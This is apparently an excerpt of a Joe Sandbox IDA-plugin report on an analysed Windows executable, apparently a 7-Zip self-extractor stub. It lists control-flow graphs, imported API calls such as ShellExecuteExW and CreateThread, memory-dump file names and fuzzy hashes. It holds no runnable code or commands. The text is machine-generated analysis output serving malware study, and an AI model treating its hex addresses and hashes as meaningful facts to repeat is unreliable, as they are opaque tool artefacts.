                                                                                                                                        control_flow_graph 1145 4053b2-4053f7 call 4014eb * 2 memset 1150 405403-405407 1145->1150 1151 4053f9-4053fc 1145->1151 1152 405410-40542a call 404e9f call 401403 1150->1152 1153 405409 1150->1153 1151->1150 1158 405445-40545d ShellExecuteExW 1152->1158 1159 40542c-405434 ??3@YAXPAX@Z 1152->1159 1153->1152 1161 405485-405487 1158->1161 1162 40545f-405466 1158->1162 1160 405437-405444 ??3@YAXPAX@Z 1159->1160 1163 40547c-405483 ??3@YAXPAX@Z 1161->1163 1164 405473-405476 CloseHandle 1162->1164 1165 405468-40546d WaitForSingleObject 1162->1165 1163->1160 1164->1163 1165->1164
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 004053D6
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?), ref: 0040542F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00405437
                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00405455
                                                                                                                                        • WaitForSingleObject.KERNEL32(004071CC,000000FF), ref: 0040546D
                                                                                                                                        • CloseHandle.KERNEL32(004071CC), ref: 00405476
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040547D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2700081640-0
                                                                                                                                        • Opcode ID: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                                                                                        • Instruction ID: a17db50f12ff5cb4ace43bc03755f74cf1bf378a7c310b81d7eb3e61b1d8450d
                                                                                                                                        • Opcode Fuzzy Hash: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                                                                                        • Instruction Fuzzy Hash: 3D212B71804208ABDB119FD5D885AEFBBB8EF44319F10812BE915B61A1D7785985CF84

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1166 401e6b-401e7a CreateDirectoryW 1167 401eac-401eb0 1166->1167 1168 401e7c-401e89 GetLastError 1166->1168 1169 401e96-401ea3 GetFileAttributesW 1168->1169 1170 401e8b 1168->1170 1169->1167 1172 401ea5-401ea7 1169->1172 1171 401e8c-401e95 SetLastError 1170->1171 1172->1167 1173 401ea9-401eaa 1172->1173 1173->1171
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryW.KERNELBASE(a:@,00000000,-00000001,00403A61,?,00401A74,?,?,?,?,00401A74,?), ref: 00401E72
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00401A74,?), ref: 00401E7C
                                                                                                                                        • SetLastError.KERNEL32(000000B7,?,?,?,?,00401A74,?), ref: 00401E8C
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00401E9A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                                        • String ID: a:@
                                                                                                                                        • API String ID: 635176117-3844204524
                                                                                                                                        • Opcode ID: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                                                                                        • Instruction ID: 62bb911204df67689409a0bf299a5fa733f048eefc6419992ca9e78119752425
                                                                                                                                        • Opcode Fuzzy Hash: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                                                                                        • Instruction Fuzzy Hash: 0CE09A3494A210BFEB212B24FC087DF3B549F01321F608A36FC19E21F0C3388852868A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1177 416891-4168ae call 413b40 1180 4168b4-4168bb call 4163a6 1177->1180 1181 4169e6-4169e9 1177->1181 1184 4168c4-4168f3 call 40b2b0 memcpy 1180->1184 1185 4168bd-4168bf 1180->1185 1188 4168f6-4168fe 1184->1188 1185->1181 1189 416900-41690e 1188->1189 1190 416916-41692e 1188->1190 1191 416910 1189->1191 1192 41698a-416993 ??3@YAXPAX@Z 1189->1192 1196 416930-416935 1190->1196 1197 416995 1190->1197 1191->1190 1193 416912-416914 1191->1193 1194 4169e4-4169e5 1192->1194 1193->1190 1193->1192 1194->1181 1199 416937-41693f 1196->1199 1200 41699a-41699d 1196->1200 1198 416997-416998 1197->1198 1201 4169dd-4169e2 ??3@YAXPAX@Z 1198->1201 1202 416941 1199->1202 1203 416973-416985 memmove 1199->1203 1200->1198 1201->1194 1204 416950-416954 1202->1204 1203->1188 1205 416956-416958 1204->1205 1206 416948-41694a 1204->1206 1205->1203 1207 41695a-416963 call 4163a6 1205->1207 1206->1203 1208 41694c-41694d 1206->1208 1211 416965-416971 1207->1211 1212 41699f-4169d5 memcpy call 412a6a 1207->1212 1208->1204 1211->1203 1213 416943-416946 1211->1213 1214 4169d8-4169db 1212->1214 1213->1204 1214->1201
                                                                                                                                        APIs
                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 004168E8
                                                                                                                                        • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 0041697F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0041698B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@memcpymemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3549172513-0
                                                                                                                                        • Opcode ID: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                                                                                        • Instruction ID: 6694c7cce515cef0b0cd55d5e6bb9cb7435d9f647c4cb47c4d4af15ebe31c866
                                                                                                                                        • Opcode Fuzzy Hash: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                                                                                        • Instruction Fuzzy Hash: 2D41CEB1A10204ABDB20DE65C941BFFB7B9EF44704F16446EE845A7241D738EE81CBA9

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1229 404d0b-404d8c #17 call 418f40 call 402427 call 40247d * 7 1248 404d91-404da5 SHGetSpecialFolderPathW 1229->1248 1249 404e3a-404e3e 1248->1249 1250 404dab-404df5 wsprintfW call 4014eb * 2 call 401403 * 2 call 4035cf 1248->1250 1249->1248 1252 404e44-404e48 1249->1252 1261 404dfa-404e00 1250->1261 1262 404e02-404e25 call 401403 * 2 call 4035cf 1261->1262 1263 404e2a-404e30 1261->1263 1262->1263 1263->1261 1265 404e32-404e35 call 402990 1263->1265 1265->1249
                                                                                                                                        APIs
                                                                                                                                        • #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                                                                                          • Part of subcall function 00402427: GetUserDefaultUILanguage.KERNEL32(00404D27,?,?), ref: 00402431
                                                                                                                                          • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                          • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                                                                                          • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                          • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                          • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                          • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                          • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                          • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00AA90C0,?), ref: 00402541
                                                                                                                                          • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(00AA90C0), ref: 00402551
                                                                                                                                          • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                          • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                          • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                          • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                          • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                                                                                          • Part of subcall function 0040247D: _wtol.MSVCRT ref: 0040260A
                                                                                                                                          • Part of subcall function 0040247D: MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00AA90C0,00000002), ref: 0040262A
                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                                                                                        • wsprintfW.USER32 ref: 00404DB8
                                                                                                                                          • Part of subcall function 004035CF: ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                                                        • String ID: 7zSfxFolder%02d
                                                                                                                                        • API String ID: 3387708999-2820892521
                                                                                                                                        • Opcode ID: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                                                                                        • Instruction ID: 1fdf757244b44e0294be47ca2d8d1062c2b35c8cdb495cdfc6011dfc87a7cf41
                                                                                                                                        • Opcode Fuzzy Hash: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                                                                                        • Instruction Fuzzy Hash: 8F317CB1A112089ECB11FFB2DD8AEEE7BA8AF44305F00403FA559A61E1EB784545CB59

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1271 40b2b0-40b2bb 1272 40b300-40b302 1271->1272 1273 40b2bd-40b2c0 1271->1273 1274 40b2c2-40b2d2 ??2@YAPAXI@Z 1273->1274 1275 40b2eb 1273->1275 1276 40b2d4-40b2d6 1274->1276 1277 40b2ed-40b2ff ??3@YAXPAX@Z 1274->1277 1275->1277 1278 40b2d8 1276->1278 1279 40b2da-40b2e9 memmove 1276->1279 1277->1272 1278->1279 1279->1277
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2C3
                                                                                                                                        • memmove.MSVCRT(00000000,?,?), ref: 0040B2E0
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2F1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@??3@memmove
                                                                                                                                        • String ID: hA
                                                                                                                                        • API String ID: 3828600508-1221461045
                                                                                                                                        • Opcode ID: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                                                                                                                        • Instruction ID: d87302abea443053d5760b5c6252bf4bae7be4f47644660215ecec497c7fda62
                                                                                                                                        • Opcode Fuzzy Hash: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                                                                                                                        • Instruction Fuzzy Hash: BEF0B4B66006005BC2209B1B9C9485BB7E9EFC9700704887FE92ED3700D334FC54C6AE

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1280 402ee4-402f2e call 4192c0 call 412a6a lstrlenA * 2 1284 402f33-402f4f call 412a36 1280->1284 1286 402f55-402f5a 1284->1286 1287 40301f 1284->1287 1286->1287 1288 402f60-402f6a 1286->1288 1289 403021-403025 1287->1289 1290 402f6d-402f72 1288->1290 1291 402fb1-402fb6 1290->1291 1292 402f74-402f79 1290->1292 1293 402fb8-402fcb memcmp 1291->1293 1294 402fdb-402fff memmove 1291->1294 1292->1294 1295 402f7b-402f8e memcmp 1292->1295 1296 402fab-402faf 1293->1296 1297 402fcd-402fd9 1293->1297 1298 403001-403008 1294->1298 1299 40300e-403019 1294->1299 1300 402f94-402f9e 1295->1300 1301 40301b-40301d 1295->1301 1296->1290 1297->1290 1298->1299 1302 402f30 1298->1302 1299->1289 1300->1287 1303 402fa0-402fa6 call 402c21 1300->1303 1301->1289 1302->1284 1303->1296
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F16
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F1E
                                                                                                                                        • memcmp.MSVCRT(00000000,?,?), ref: 00402F84
                                                                                                                                        • memcmp.MSVCRT(00000000,?,?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FC1
                                                                                                                                        • memmove.MSVCRT(?,?,00000000,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FF3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemcmp$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3251180759-0
                                                                                                                                        • Opcode ID: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                                                                                        • Instruction ID: 79ec95c0005fca4e8b411a1d1c8c43267f3aca6e0e8108953f5cc2358a2b563c
                                                                                                                                        • Opcode Fuzzy Hash: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                                                                                        • Instruction Fuzzy Hash: 9B417072D0120AAFCF01DFA4C9849EEBFB9EF48384F0444AAE805B3245D3759E85DB55

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1307 4019d2-4019e9 ??2@YAPAXI@Z 1308 4019f4 1307->1308 1309 4019eb-4019f2 call 41616a 1307->1309 1311 4019f6-401a1f call 41334e call 412a6a 1308->1311 1309->1311 1317 401a90 1311->1317 1318 401a21-401a2b ??2@YAPAXI@Z 1311->1318 1319 401a93-401aaa call 409606 1317->1319 1320 401a46 1318->1320 1321 401a2d-401a44 1318->1321 1326 401aab-401ab0 1319->1326 1323 401a48-401a5f call 40113f 1320->1323 1321->1323 1323->1319 1330 401a61-401a6b 1323->1330 1328 401ab2-401ab4 1326->1328 1329 401ab8-401aba 1326->1329 1328->1329 1331 401ac2-401ac7 1329->1331 1332 401abc-401abe 1329->1332 1333 401a79-401a83 ??2@YAPAXI@Z 1330->1333 1334 401a6d-401a6f call 4039e7 1330->1334 1336 401afc-401b00 1331->1336 1332->1331 1337 401a85-401a8e call 4016d4 1333->1337 1338 401ac9 1333->1338 1339 401a74-401a77 1334->1339 1340 401acb-401adc call 4015d8 call 401880 1337->1340 1338->1340 1339->1326 1339->1333 1346 401ae1-401ae8 1340->1346 1347 401af0-401af2 1346->1347 1348 401aea-401aec 1346->1348 1349 401af4-401af6 1347->1349 1350 401afa 1347->1350 1348->1347 1349->1350 1350->1336
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,0041E9E8,ExecuteFile,00000026,00000026,?,00406D79,?,0041E9E8,0041E9E8), ref: 004019DF
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00401A23
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 00401A7B
                                                                                                                                          • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                          • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                          • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                          • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                          • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                          • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                          • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                          • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                          • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                          • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                          • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@$FormatMessagelstrcpylstrlen$??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                        • String ID: ExecuteFile
                                                                                                                                        • API String ID: 1592922708-323923146
                                                                                                                                        • Opcode ID: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                                                                                                                        • Instruction ID: c177ff4ec49e1bf3251047196a645ec591425be599670d09217b52daf662347d
                                                                                                                                        • Opcode Fuzzy Hash: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                                                                                                                        • Instruction Fuzzy Hash: 3D31A075701204BFCB10DBA6CC85DAF77A9EF85314724486FF405EB2A1DA789D80CB69

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1352 401880-4018d6 call 4136b9 call 401403 call 401795 CreateThread 1359 4018d8 call 408caa 1352->1359 1360 4018dd-4018f8 WaitForSingleObject 1352->1360 1359->1360 1361 4018fa-4018fd 1360->1361 1362 40192c-401932 1360->1362 1364 401920 1361->1364 1365 4018ff-401902 1361->1365 1366 401990 1362->1366 1367 401934-401949 GetExitCodeThread 1362->1367 1370 401922-40192a call 409606 1364->1370 1368 401904-401907 1365->1368 1369 40191c-40191e 1365->1369 1371 401995-401998 1366->1371 1372 401953-40195e 1367->1372 1373 40194b-40194d 1367->1373 1376 401918-40191a 1368->1376 1377 401909-40190c 1368->1377 1369->1370 1370->1366 1374 401960-401961 1372->1374 1375 401966-40196f 1372->1375 1373->1372 1379 40194f-401951 1373->1379 1380 401963-401964 1374->1380 1381 401971-401978 1375->1381 1382 40197a-401986 SetLastError 1375->1382 1376->1370 1383 401913-401916 1377->1383 1384 40190e-401911 1377->1384 1379->1371 1386 401988-40198d call 409606 1380->1386 1381->1366 1381->1382 1382->1386 1383->1380 1384->1366 1384->1383 1386->1366
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,0040133C,00000000,00000000,?), ref: 004018C4
                                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF,?,00401AE1,?,?), ref: 004018E5
                                                                                                                                          • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                          • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                          • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                          • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                          • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                          • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                          • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                          • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                          • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                          • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                          • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 359084233-0
                                                                                                                                        • Opcode ID: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                                                                                        • Instruction ID: 75a92c2673557d9aa231ca5611e15780e437056db76e39d6c0de200791827833
                                                                                                                                        • Opcode Fuzzy Hash: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                                                                                        • Instruction Fuzzy Hash: 143124F5640200BAEB315B16DC55ABB3769EB84350F24813BF905FA2F0C6788981D72E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1389 41271d-41272a 1390 4127b1-4127b4 1389->1390 1391 412730-412736 1389->1391 1392 412738 1391->1392 1393 41274d-41275e 1391->1393 1396 41273f-412748 _CxxThrowException 1392->1396 1394 412760-412767 1393->1394 1395 412769-41276d 1393->1395 1394->1396 1397 4127a1-4127b0 ??3@YAXPAX@Z 1395->1397 1398 41276f-41277a ??2@YAPAXI@Z 1395->1398 1396->1393 1397->1390 1399 412785-41278a 1398->1399 1400 41277c-412783 1398->1400 1401 41278c 1399->1401 1402 41278e-41279e memcpy 1399->1402 1400->1396 1401->1402 1402->1397
                                                                                                                                        APIs
                                                                                                                                        • _CxxThrowException.MSVCRT(00100EC3,0041C670), ref: 00412748
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 00412770
                                                                                                                                        • memcpy.MSVCRT(00000000,00AAC110,00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?), ref: 00412799
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00AAC110,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 004127A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3462485524-0
                                                                                                                                        • Opcode ID: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
